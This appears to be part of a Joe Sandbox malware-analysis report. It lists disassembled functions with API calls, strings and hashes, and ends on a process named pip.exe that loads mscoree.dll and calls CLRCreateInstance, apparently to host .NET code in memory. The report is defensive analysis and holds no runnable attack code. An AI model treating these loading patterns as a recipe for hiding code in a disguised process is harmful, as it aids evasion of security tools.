Instruction Fuzzy Hash: 7B61717691C292C6EB74AF298C451BCB7A5EB05B28FE41135DA4B42796CF28F481CF31

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BE55D4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BE5601
_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BE5634

Strings

, xrefs: 00007FF720BE5782

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-3916222277
Opcode ID: 7336c6b1b8cef402cd81652aea3174f170f050f10262c53445015a526692f56d
Instruction ID: bd13e44c582055f1f8155041c1200664baf1676a0a8349f1c22c22d42c0c23c2
Opcode Fuzzy Hash: 7336c6b1b8cef402cd81652aea3174f170f050f10262c53445015a526692f56d
Instruction Fuzzy Hash: 72616D7291D286CAEB74AF288C4427CB7A5EB15B18FD41135CA4B463D9CF28F894CE30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B7DEB0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

CCG , xrefs: 00007FF720B7E018
csm, xrefs: 00007FF720B7E00F

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ContextEntryFunctionLookup$CaptureRestoreUnwindVirtual
String ID: CCG $csm
API String ID: 3115360832-2763669848
Opcode ID: dc8fccf7ca8e766654be7590a9894087392905afef7ade7a48763b5d94113a86
Instruction ID: 03feee81170474647f3ff2c034043c53ae772e2618751977670437f21f003d28
Opcode Fuzzy Hash: dc8fccf7ca8e766654be7590a9894087392905afef7ade7a48763b5d94113a86
Instruction Fuzzy Hash: 4741A426A0874582EA35AB1AEC0937DA361EF48BD4F944135DE5E0BBE5DE7CF4418B30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0B4BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C0B4FF

Strings

gfff, xrefs: 00007FF720C0B621
e+000, xrefs: 00007FF720C0B5A4

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: 4d715df011184d0384ef2c0a8b9eb83a41ce5f6d5ed9fe64f526ca6b20865ed3
Instruction ID: 91bd28bb21354328fd77d6036f2897b8c1ed516dc825a6d8289a3a1fe39611b6
Opcode Fuzzy Hash: 4d715df011184d0384ef2c0a8b9eb83a41ce5f6d5ed9fe64f526ca6b20865ed3
Instruction Fuzzy Hash: CA511FA2B187C146E724DB399C413A9E762FB40B90F888271D75C47BD5DE2DF484CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C00EB0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF720C0113B

Strings

!, xrefs: 00007FF720C0112B
fmod, xrefs: 00007FF720C0110C

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _handle_error
String ID: !$fmod
API String ID: 1757819995-3213614193
Opcode ID: 3486dae74be8d2bf4559ced1ca804f4ce772c55f7fad267fccd18b6ac7307164
Instruction ID: 7092ec992f6ff84fe830e6871b8e03577dbdd66cc0d188dc70ff5af52d042086
Opcode Fuzzy Hash: 3486dae74be8d2bf4559ced1ca804f4ce772c55f7fad267fccd18b6ac7307164
Instruction Fuzzy Hash: 4951D8A1C2CB814AE223677998117F9D658FFA63C4F509333FD4A31F65DB1D71828A24

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0CF28 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF720C0D03F
GetLastError.KERNEL32 ref: 00007FF720C0D061

Strings

U, xrefs: 00007FF720C0CFEB

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 64caa10afcb0b3e9bdc43fafa48991d91f9dac045ff2b8f9ba1d715bc28533f2
Instruction ID: 9ba537380fa2858dc5fe7070b54021c5e5d9f3c941a30465153a9b4be4d38e52
Opcode Fuzzy Hash: 64caa10afcb0b3e9bdc43fafa48991d91f9dac045ff2b8f9ba1d715bc28533f2
Instruction Fuzzy Hash: 7441C772B1868185DB209F69E8443E9F766FB94794F804031EE4D87758DF3CE481CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C10650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_set_errno_from_matherr.LIBCMT ref: 00007FF720C106FC
_set_errno_from_matherr.LIBCMT ref: 00007FF720C10710

Strings

tanh, xrefs: 00007FF720C10677

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _set_errno_from_matherr
String ID: tanh
API String ID: 1187470696-874243715
Opcode ID: 0df01c4d3716d176c8033b9ee1a2b3e3dcb4d4f7419aade9133a7a272eb46637
Instruction ID: 2941e4410ab3c646e4625e112969abcf0e379770b5e35b5e55d3d932f9ed1fc3
Opcode Fuzzy Hash: 0df01c4d3716d176c8033b9ee1a2b3e3dcb4d4f7419aade9133a7a272eb46637
Instruction Fuzzy Hash: D5210376A186458BE750DF2CE8401AAF7A0FF89310F905535F68D92B55DE7CF4808F20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BA88BE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF720C05D97

Strings

sqrt, xrefs: 00007FF720C05D58
!, xrefs: 00007FF720C05D83

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _handle_error
String ID: !$sqrt
API String ID: 1757819995-799759792
Opcode ID: 3d8d27d03e2554664d99fe904a843613c1529ac74455d068ca8da587f3d6b841
Instruction ID: 56cc704407cfbfc201c0602971e7b4c200ca4d394b45e71ddf92bb9e496fb957
Opcode Fuzzy Hash: 3d8d27d03e2554664d99fe904a843613c1529ac74455d068ca8da587f3d6b841
Instruction Fuzzy Hash: 171107B2918B8583DA10DB25990436AA622FF967E0F508331EA6806BD8DF2CF0C5DF10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C09978 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF720C099B1
CompareStringW.KERNEL32 ref: 00007FF720C09A39

Strings

CompareStringEx, xrefs: 00007FF720C09994, 00007FF720C099A5

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: CompareStringtry_get_function
String ID: CompareStringEx
API String ID: 3328479835-2590796910
Opcode ID: b9a81c18c85f8aa471723c89ba3257d79275654ee71a63e90f46d91bca982dcf
Instruction ID: 5bc23e76e1c22317a15c7a9fb821029154144bb1a92413781253ca35a4cf34bd
Opcode Fuzzy Hash: b9a81c18c85f8aa471723c89ba3257d79275654ee71a63e90f46d91bca982dcf
Instruction Fuzzy Hash: 56113E72608B8086D764DB19B8402AAB7A5FBD9BD0F544135EECD53B59CF3CE480CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C09C18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF720C09C51
GetDateFormatW.KERNEL32(?,?,?,?,?,?,?,00007FF720C146C1,?,?,?,?,?,?,?,00000000), ref: 00007FF720C09CB3

Strings

GetDateFormatEx, xrefs: 00007FF720C09C34, 00007FF720C09C45

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: DateFormattry_get_function
String ID: GetDateFormatEx
API String ID: 595753042-159735388
Opcode ID: ae91f775559fdd773db68d2a3df91305be9197e359e4adfaf81ac6ff22e26d2c
Instruction ID: 5e25665965362d09e11515a56f6a54fbf5bc62c0df9085cdd52c0c846151100d
Opcode Fuzzy Hash: ae91f775559fdd773db68d2a3df91305be9197e359e4adfaf81ac6ff22e26d2c
Instruction Fuzzy Hash: 4C1181B1A08B80C7E650DF19B8001DAB7A1FB98BD0F544136EE8D43B68CE3CE5808F20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C09D54 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF720C09D8D
GetTimeFormatW.KERNEL32(?,?,?,?,?,?,?,00007FF720C14772,?,?,?,?,?,?,?,00000000), ref: 00007FF720C09DE4

Strings

GetTimeFormatEx, xrefs: 00007FF720C09D70, 00007FF720C09D81

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: FormatTimetry_get_function
String ID: GetTimeFormatEx
API String ID: 3261793192-1692793031
Opcode ID: f1ddae523debab6bf048c284bf48d6aace1c9e158f355b230673b210b9cf96d8
Instruction ID: 9fcfbf30873be238d6bc1b4b2586c4b459a19670d334d378d99085a793d28513
Opcode Fuzzy Hash: f1ddae523debab6bf048c284bf48d6aace1c9e158f355b230673b210b9cf96d8
Instruction Fuzzy Hash: 78116361A08781C6E710AB1AA8001DAB7A1FB98BD0F540135EE8D53B29CE3CE584CF20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BA25B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF720BA25D2
FormatMessageA.KERNEL32 ref: 00007FF720BA2602

Strings

system error %d, xrefs: 00007FF720BA261E

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID: system error %d
API String ID: 3479602957-1688351658
Opcode ID: 8332af026310832f434476acea3ba6885ae8396224c2dbcaec45421bbfbf08f1
Instruction ID: bfb8e3accb5e2402873d2f1d372fddcb553eac9d8e81d3f357c9a3b9f6434fcb
Opcode Fuzzy Hash: 8332af026310832f434476acea3ba6885ae8396224c2dbcaec45421bbfbf08f1
Instruction Fuzzy Hash: A801B531A1868186F770AB19FC157AAA2A1FF88780F904135DA4D43B58DF3CE4448F30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C09E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF720C09E29
GetUserDefaultLCID.KERNEL32(?,?,000000A0,00007FF720C19C60), ref: 00007FF720C09E40

Strings

GetUserDefaultLocaleName, xrefs: 00007FF720C09E0C, 00007FF720C09E16

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: DefaultUsertry_get_function
String ID: GetUserDefaultLocaleName
API String ID: 3217810228-151340334
Opcode ID: 8d9eb975ebd9b73e43f347966b6e4b461a0a53dd1fd7c151eb977a5abb739598
Instruction ID: dec4f32e5e0dc4f0222f30ccf6c150f58b601b5a65e311923fb17ef1d843988b
Opcode Fuzzy Hash: 8d9eb975ebd9b73e43f347966b6e4b461a0a53dd1fd7c151eb977a5abb739598
Instruction Fuzzy Hash: B8F05491B1854286EB58BB6DAD806F59252FF58BC0FC45036D91D56B55CE3CB8C4CB30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C09E64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF720C09E95
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF720C0DB62,?,?,?,00007FF720C0DA5A,?,?,?,00007FF720BFB59D), ref: 00007FF720C09EAF

Strings

InitializeCriticalSectionEx, xrefs: 00007FF720C09E89

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 9b89a648009126e3679e5c9c6c7b270f53a601a9df6bf21ee630fcfe565e4a35
Instruction ID: 071b12fbb27b71d7608ed5e3ebebf2de46914b81275e012ae073af9965ffbc62
Opcode Fuzzy Hash: 9b89a648009126e3679e5c9c6c7b270f53a601a9df6bf21ee630fcfe565e4a35
Instruction Fuzzy Hash: 49F054A5A1969182E758FB59F8400E5A221FF48B80FC45035EA2D13F54CE3CF8D5CB30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C09BC4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF720C09BED
TlsSetValue.KERNEL32(?,?,?,00007FF720C0AF02,?,?,?,00007FF720BFB3E1,?,?,?,?,00007FF720C10643), ref: 00007FF720C09C04

Strings

FlsSetValue, xrefs: 00007FF720C09BDA

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 14eb54919eaf09d7f5c697f3172bdc7af3da22ecbcc84ea25ba25b777209fee2
Instruction ID: 1ec0d331b03fdfe347ae430215891a8ab4d02f5c879e46aa04d2085235342584
Opcode Fuzzy Hash: 14eb54919eaf09d7f5c697f3172bdc7af3da22ecbcc84ea25ba25b777209fee2
Instruction Fuzzy Hash: 5BE030E1A0864296FB487B6DEC041F9A262FF58790FC84032D91D0ABA4CE3CF5D4CA30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B8FF50 Relevance: 5.1, APIs: 4, Instructions: 60sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF720B8FF67
EnterCriticalSection.KERNEL32 ref: 00007FF720B8FF97
LeaveCriticalSection.KERNEL32 ref: 00007FF720B8FFF5
Sleep.KERNEL32 ref: 00007FF720B8FFFD

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: CriticalSectionSleep$EnterLeave
String ID:
API String ID: 890587828-0
Opcode ID: 2e5f2a7be58a541593dcebee813d02368c63509f341683be91463bad87c06b5d
Instruction ID: b10eb33cd9e6fdabc98ee48f8515340638a3896ddba08e5efacf9275243b338b
Opcode Fuzzy Hash: 2e5f2a7be58a541593dcebee813d02368c63509f341683be91463bad87c06b5d
Instruction Fuzzy Hash: BA2162326096828BD764AB349C5427DB361FB45B54F540239EB5F027E8CF3CF8858B20

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: pip.exePID: 1136, Parent PID: 8024COMMON

Executed Functions

Function 6CF0B6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF0B73F
VariantInit.OLEAUT32(?), ref: 6CF0B748
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF0B7BE
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF0B7F5
VariantClear.OLEAUT32(?), ref: 6CF0B801

Part of subcall function 6CF0C850: VariantInit.OLEAUT32(?), ref: 6CF0C88F
Part of subcall function 6CF0C850: VariantInit.OLEAUT32(?), ref: 6CF0C895
Part of subcall function 6CF0C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF0C8A0
Part of subcall function 6CF0C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF0C8D5
Part of subcall function 6CF0C850: VariantClear.OLEAUT32(?), ref: 6CF0C8E1

VariantClear.OLEAUT32(?), ref: 6CF0BA15
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0BE90
VariantClear.OLEAUT32(?), ref: 6CF0BEA3
VariantClear.OLEAUT32(?), ref: 6CF0BEA9

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: ea49fc1ed14fd03842d8a2c958a4da88af7a11190896cd4bfee0cf3246ca637f
Instruction ID: 115b722cf25b23521f4915696c8d13b5ad69f01dc76ecb5b06360ddbc7106807
Opcode Fuzzy Hash: ea49fc1ed14fd03842d8a2c958a4da88af7a11190896cd4bfee0cf3246ca637f
Instruction Fuzzy Hash: 3F527B71E00218DFCB10DFA8C890BEEBBB5BF49704F248599E919AB741DB30A945DF90

Uniqueness

Uniqueness Score: -1.00%

Function 06F80EB3 Relevance: 23.3, Strings: 18, Instructions: 800
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HERE, xrefs: 06F817E9
LOOK, xrefs: 06F819EB
HERE, xrefs: 06F81086
p<tq, xrefs: 06F8118D
p<tq, xrefs: 06F81142
HERE, xrefs: 06F80F6F
LOOK, xrefs: 06F817E4
HERE, xrefs: 06F81592
HERE, xrefs: 06F81AA4
LOOK, xrefs: 06F80F6A
HERE, xrefs: 06F819F0
LOOK, xrefs: 06F81A9F
p<tq, xrefs: 06F81177
LOOK, xrefs: 06F812E7
p<tq, xrefs: 06F8112C
LOOK, xrefs: 06F8158D
HERE, xrefs: 06F812EC
LOOK, xrefs: 06F81081

Memory Dump Source

Source File: 00000016.00000002.2940861181.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f80000_pip.jbxd

Similarity

API ID:
String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<tq$p<tq$p<tq$p<tq
API String ID: 0-2273522380
Opcode ID: 020db03b843e00ba185bd9e2061942533a6c3d08cf8299ebf3a9b36ad1f7f36c
Instruction ID: 6fc4c1ac30dcb131f3508d656967cf7a7a2346addee6fa0bbce89f5db8e75924
Opcode Fuzzy Hash: 020db03b843e00ba185bd9e2061942533a6c3d08cf8299ebf3a9b36ad1f7f36c
Instruction Fuzzy Hash: 938285B4E002298FDB64DF69C994BD9B7B1BB48310F1482E9D50DAB355DB30AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CEFB6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,835FE394), ref: 6CEFB711
LoadLibraryW.KERNEL32(mscoree.dll), ref: 6CEFB71C
GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6CEFB730
__cftoe.LIBCMT ref: 6CEFB870
GetModuleHandleW.KERNEL32(?), ref: 6CEFB88B
GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6CEFB8D7

Strings

mscoree.dll, xrefs: 6CEFB70C, 6CEFB717
v4.0.30319, xrefs: 6CEFB767
CLRCreateInstance, xrefs: 6CEFB72A

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
